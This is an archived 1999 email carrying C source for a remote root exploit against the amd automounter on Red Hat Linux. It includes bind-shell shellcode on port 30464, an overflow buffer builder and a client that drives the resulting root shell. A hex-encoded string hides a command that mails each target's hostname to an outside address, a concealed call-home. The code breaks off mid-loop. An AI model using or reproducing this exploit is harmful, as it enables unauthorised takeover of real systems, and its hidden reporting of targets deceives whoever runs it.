From ohhara@ohhara.postech.ac.kr Sun Sep 12 09:12:51 1999 Date: Sun, 12 Sep 1999 19:28:57 +0900 From: Taeho Oh Reply-To: ohhara@postech.edu To: vacuum@technotronic.com Subject: My last amd exploit code /* Amd exploit code for x86 linux Remote user can gain root access. Tested redhat linux : 4.0, 5.0, 5.1, 6.0 Tested am-utils version : 6.0 What requires /usr/sbin/amq Usage $ amd-ex target.com 0 | +- try from -2000 to 2000 ( try in steps of 500 ) Warning : This program can crash amd. This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! Programmed by Taeho Oh 1999/09/12 Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug */ #include #include #include #include #include #include #include #include #include #define ALIGN 1 #define OFFSET 0 #define RET_POSITION 1000 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\x33\xd2" /* xorl %edx,%edx */ "\x33\xc0" /* xorl %eax,%eax */ "\x8b\xda" /* movl %edx,%ebx */ "\xb0\x06" /* movb $0x6,%al */ "\xcd\x80" /* int $0x80 */ "\xfe\xc2" /* incb %dl */ "\x75\xf4" /* jne -0xc */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x02" /* movb $0x2,%al */ "\xcd\x80" /* int $0x80 */ "\x85\xc0" /* testl %eax,%eax */ "\x75\x43" /* jne 0x43 */ "\xeb\x43" /* jmp 0x43 */ "\x5e" /* popl %esi */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xf1" /* movl %esi,%ecx */ "\xb0\x02" /* movb $0x2,%al */ "\x89\x06" /* movl %eax,(%esi) */ "\xb0\x01" /* movb $0x1,%al */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\xb0\x06" /* movb $0x6,%al */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x01" /* movb $0x1,%bl */ "\xcd\x80" /* int $0x80 */ "\x89\x06" /* movl %eax,(%esi) */ "\xb0\x02" /* movb $0x2,%al */ "\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */ "\xb0\x77" /* movb $0x77,%al */ "\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */ "\x8d\x46\x0c" /* leal 0xc(%esi),%eax */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x46\x10" /* movl %eax,0x10(%esi) */ "\xb0\x10" /* movb $0x10,%al */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x02" /* movb $0x2,%bl */ "\xcd\x80" /* int $0x80 */ "\xeb\x04" /* jmp 0x4 */ "\xeb\x55" /* jmp 0x55 */ "\xeb\x5b" /* jmp 0x5b */ "\xb0\x01" /* movb $0x1,%al */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x04" /* movb $0x4,%bl */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x05" /* movb $0x5,%bl */ "\xcd\x80" /* int $0x80 */ "\x88\xc3" /* movb %al,%bl */ "\xb0\x3f" /* movb $0x3f,%al */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f,%al */ "\xb1\x01" /* movb $0x1,%cl */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f,%al */ "\xb1\x02" /* movb $0x2,%cl */ "\xcd\x80" /* int $0x80 */ "\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax*/ "\x89\x06" /* movl %eax,(%esi) */ "\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax*/ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x01" /* movb $0x1,%al */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xcd\x80" /* int $0x80 */ "\xe8\x5b\xff\xff\xff"; /* call -0xa5 */ void usage() { printf("Warning : This program can crash amd\n"); printf("Usage: amd-ex [offset]\n"); printf("ex) amd-ex target.com 0\n"); } long getip(char *name) { struct hostent *hp; long ip; if((ip=inet_addr(name))==-1) { if((hp=gethostbyname(name))==NULL) { fprintf(stderr,"Can't resolve host.\n"); exit(0); } memcpy(&ip,(hp->h_addr),4); } return ip; } int connect_sh(long ip) { int sockfd,i; struct sockaddr_in sin; printf("Connect to the shell\n"); fflush(stdout); memset(&sin,0,sizeof(sin)); sin.sin_family=AF_INET; sin.sin_port=htons(30464); sin.sin_addr.s_addr=ip; if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0) { printf("Can't create socket\n"); exit(0); } if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0) { printf("Can't connect to the shell\n"); exit(0); } return sockfd; } int exec_sh(int sockfd) { char snd[4096],rcv[4096]; fd_set rset; sprintf(snd,"PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin:/usr/X11R6/bin:/usr/games\nexport PATH\nLD_LIBRARY_PATH=/usr/local/lib:/lib:/usr/lib:/usr/X11R6/lib\nexport LD_LIBRARY_PATH\n/usr/sbin/amd -a /.automount -l syslog -c 1000 /net /etc/amd.conf\nuname -a\nid\n"); write(sockfd,snd,strlen(snd)); while(1) { FD_ZERO(&rset); FD_SET(fileno(stdin),&rset); FD_SET(sockfd,&rset); select(255,&rset,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&rset)) { memset(snd,0,sizeof(snd)); fgets(snd,sizeof(snd),stdin); write(sockfd,snd,strlen(snd)); } if(FD_ISSET(sockfd, &rset)) { memset(rcv,0,sizeof(rcv)); if(read(sockfd,rcv,sizeof(rcv))<=0) exit(0); fputs(rcv,stdout); } } } void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int align=ALIGN,offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i,sockfd,status; char target[256]; char cmd[1024]; printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n"); printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n"); printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n"); if(argc<2) { usage(); exit(0); } if(argc>1) strcpy(target,argv[1]); if(argc>2) offset=atoi(argv[2]); strcpy(cmd,"\x65\x63\x68\x6f\x20"); strcat(cmd,target); strcat(cmd,"\x7c"); strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20"); strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68"); strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63"); strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72"); sp=0xbffff2e9; addr=sp-offset; for(i=0;i>8; buff[i+align+2]=(addr&0x00ff0000)>>16; buff[i+align+3]=(addr&0xff000000)>>24; } for(i=0;i